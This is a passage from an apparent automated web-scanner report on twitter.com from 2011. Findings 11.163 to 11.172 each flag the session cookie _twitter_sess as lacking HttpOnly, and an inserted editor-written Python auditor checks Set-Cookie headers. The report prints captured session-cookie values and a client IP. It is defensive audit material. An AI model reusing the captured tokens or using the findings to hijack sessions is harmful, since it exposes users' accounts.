Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:12 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225072-30588-18769
ETag: "467245d95e03c9c4efa08a62b5cdfe26"
Last-Modified: Fri, 28 Jan 2011 14:31:12 GMT
X-Runtime: 0.01191
Content-Type: text/html; charset=utf-8
Content-Length: 52265
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.163. http://twitter.com/ryanolson

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /ryanolson

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ryanolson HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:39 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225039-20499-32646
ETag: "d2211433f4fd1a9e6d92a74f1cc30349"
Last-Modified: Fri, 28 Jan 2011 14:30:39 GMT
X-Runtime: 0.01104
Content-Type: text/html; charset=utf-8
Content-Length: 54351
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.164. http://twitter.com/scott_gonzalez

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /scott_gonzalez

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scott_gonzalez HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:38 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225038-20727-28381
ETag: "e3250478c3ea8a086affa5704f05f05d"
Last-Modified: Fri, 28 Jan 2011 14:30:38 GMT
X-Runtime: 0.01142
Content-Type: text/html; charset=utf-8
Content-Length: 46926
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
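Every finding in this section reports the same condition: twitter.com issues its _twitter_sess cookie (and the auth_token deletion) without the HttpOnly attribute, so script running in the page can read the session cookie through document.cookie. The block below is an added example written for this edited copy; it is not scanner output and not Twitter code. It parses the Set-Cookie headers of a raw HTTP response and reports cookies that lack HttpOnly and, for responses received over TLS, Secure. The sample response is constructed from the header layout shown in these findings with the session value shortened; the guest_id cookie carrying HttpOnly is invented so the clean case is exercised; the SESSION_HINTS list and the "cookie is being deleted" heuristic are the example's own assumptions, not Burp's logic.

```python
# Added example (editor-written, not part of the scanner report): parse the
# Set-Cookie headers of a raw HTTP response and flag cookies that lack the
# HttpOnly attribute these findings report as missing, plus the sibling
# Secure check for responses received over TLS.
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Name fragments that suggest a cookie carries a session or auth token.
# Heuristic only (an assumption of this example, not the scanner's rule).
SESSION_HINTS = ("sess", "session", "auth", "token", "sid")


@dataclass
class CookieFinding:
    name: str
    value: str
    attributes: Dict[str, str]
    deleted: bool                 # server is clearing the cookie (empty value, past Expires)
    session_like: bool            # name matches SESSION_HINTS
    missing: List[str] = field(default_factory=list)


def parse_set_cookie(header_value: str) -> Tuple[str, str, Dict[str, str]]:
    """Split one Set-Cookie value into (name, value, {attribute: value}).

    Attribute names are lower-cased; flag attributes (HttpOnly, Secure) map to "".
    Splitting on ';' is safe because a cookie value cannot contain ';'.
    """
    first, *rest = (p.strip() for p in header_value.split(";"))
    name, _, value = first.partition("=")
    attrs: Dict[str, str] = {}
    for part in rest:
        if part:
            key, _, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def response_headers(raw: str) -> List[Tuple[str, str]]:
    """Return (lower-cased name, value) pairs from the header block of a raw response."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    pairs = []
    for line in head.split("\n")[1:]:          # skip the status line
        key, sep, val = line.partition(":")
        if sep:
            pairs.append((key.strip().lower(), val.strip()))
    return pairs


def audit_cookies(raw: str, over_tls: bool = False) -> List[CookieFinding]:
    """Return one CookieFinding per Set-Cookie header, with its missing attributes."""
    findings = []
    for key, val in response_headers(raw):
        if key != "set-cookie":
            continue
        name, value, attrs = parse_set_cookie(val)
        expires = attrs.get("expires", "")
        # Deletion heuristic (assumption): empty value with an epoch Expires or Max-Age=0.
        deleted = value == "" and ("1970" in expires or attrs.get("max-age") == "0")
        f = CookieFinding(
            name=name, value=value, attributes=attrs, deleted=deleted,
            session_like=any(h in name.lower() for h in SESSION_HINTS),
        )
        if not deleted:                      # a deletion carries no secret worth protecting
            if "httponly" not in attrs:
                f.missing.append("HttpOnly")
            if over_tls and "secure" not in attrs:
                f.missing.append("Secure")
        findings.append(f)
    return findings


def report_lines(raw: str, over_tls: bool = False) -> List[str]:
    """One human-readable line per cookie that is missing an attribute."""
    lines = []
    for f in audit_cookies(raw, over_tls):
        if f.missing:
            tag = " (session-like)" if f.session_like else ""
            scope = f.attributes.get("domain", "host-only")
            lines.append(f"{f.name}{tag}: missing {', '.join(f.missing)}; domain={scope}")
    return lines


# Constructed sample: the header layout of the twitter.com responses in these
# findings with the session value shortened, plus an invented guest_id cookie
# that does carry HttpOnly so the clean case is exercised too.
SAMPLE_RESPONSE = (
    "HTTP/1.0 200 OK\r\n"
    "Date: Fri, 28 Jan 2011 14:30:38 GMT\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT\r\n"
    "Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdA--a8f223ad45d09367; domain=.twitter.com; path=/\r\n"
    "Set-Cookie: guest_id=129452629042599503; path=/; HttpOnly\r\n"
    "X-XSS-Protection: 1; mode=block\r\n"
    "Connection: close\r\n"
    "\r\n"
    "<!DOCTYPE html><html></html>\r\n"
)

if __name__ == "__main__":
    for line in report_lines(SAMPLE_RESPONSE, over_tls=True):
        print(line)
```

Running the block prints one line per problem cookie. Two caveats a reviewer of these findings would want: the responses on this page were fetched over plain http://, so the scanner does not raise the Secure check here (pass over_tls=True when auditing an https:// response), and HttpOnly only stops script from reading the cookie; it does nothing against a network observer on plain HTTP or against CSRF. The cookie is also scoped with domain=.twitter.com, so every subdomain receives it, which widens the set of hosts whose XSS would expose the session.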

11.165. http://twitter.com/search

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /search

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (the Set-Cookie header in the response below carries no HttpOnly attribute). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225016-47325-41983
ETag: "98f573cd8faa541b15eed6e89977a1f8"
Last-Modified: Fri, 28 Jan 2011 14:30:16 GMT
X-Runtime: 0.07569
Content-Type: text/html; charset=utf-8
Content-Length: 19528
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlM2UyNzM1ZTZiZTAyMzMyZmQ2NWQ3MzBlYmU0MWEz%250AODA6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--b3402f9fff3f356babde838d74594264b0e647aa; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...

11.166. http://twitter.com/sentience

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /sentience

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (the Set-Cookie header in the response below carries no HttpOnly attribute). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sentience HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225077-43301-33019
ETag: "6e942a84bdcf3e0bad65268b7ad885b6"
Last-Modified: Fri, 28 Jan 2011 14:31:17 GMT
X-Runtime: 0.01443
Content-Type: text/html; charset=utf-8
Content-Length: 50391
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.167. http://twitter.com/sessions/destroy

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /sessions/destroy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (the Set-Cookie header in the response below carries no HttpOnly attribute). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sessions/destroy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 404 Not Found
Date: Fri, 28 Jan 2011 14:31:21 GMT
Server: hi
Status: 404 Not Found
X-Transaction: 1296225081-37787-17414
Last-Modified: Fri, 28 Jan 2011 14:31:21 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9230
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...

11.168. http://twitter.com/share

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /share

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (the Set-Cookie header in the response below carries no HttpOnly attribute). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /share HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 403 Forbidden
Date: Sat, 29 Jan 2011 01:52:51 GMT
Server: hi
Status: 403 Forbidden
X-Transaction: 1296265971-85703-18326
Last-Modified: Sat, 29 Jan 2011 01:52:51 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4792
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>

<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="Content-Language" content="en-us" />
<title>Twitter / Valid URL par
...[SNIP]...

11.169. http://twitter.com/signup

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /signup

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (the Set-Cookie header in the response below carries no HttpOnly attribute). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signup HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 302 Found
Date: Fri, 28 Jan 2011 14:25:38 GMT
Server: hi
Status: 302 Found
X-Transaction: 1296224738-57578-22704
Last-Modified: Fri, 28 Jan 2011 14:25:38 GMT
Location: https://twitter.com/signup
X-Runtime: 0.00757
Content-Type: text/html; charset=utf-8
Content-Length: 92
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<html><body>You are being <a href="https://twitter.com/signup">redirected</a>.</body></html>

11.170. http://twitter.com/simplemodal

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /simplemodal

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (the Set-Cookie header in the response below carries no HttpOnly attribute). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /simplemodal HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:29:05 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224945-98814-3009
ETag: "203a0c353b6f6f89b45f107452b2203c"
Last-Modified: Fri, 28 Jan 2011 14:29:05 GMT
X-Runtime: 0.02016
Content-Type: text/html; charset=utf-8
Content-Length: 47151
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.171. http://twitter.com/sitepointdotcom

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /sitepointdotcom

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (the Set-Cookie header in the response below carries no HttpOnly attribute). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitepointdotcom HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:34 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225034-62449-28872
ETag: "9ce581b329f6d5870310b5ced0d02fe8"
Last-Modified: Fri, 28 Jan 2011 14:30:34 GMT
X-Runtime: 0.01185
Content-Type: text/html; charset=utf-8
Content-Length: 53056
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.172. http://twitter.com/slaterusa

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /slaterusa

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (the Set-Cookie header in the response below carries no HttpOnly attribute). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /slaterusa HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
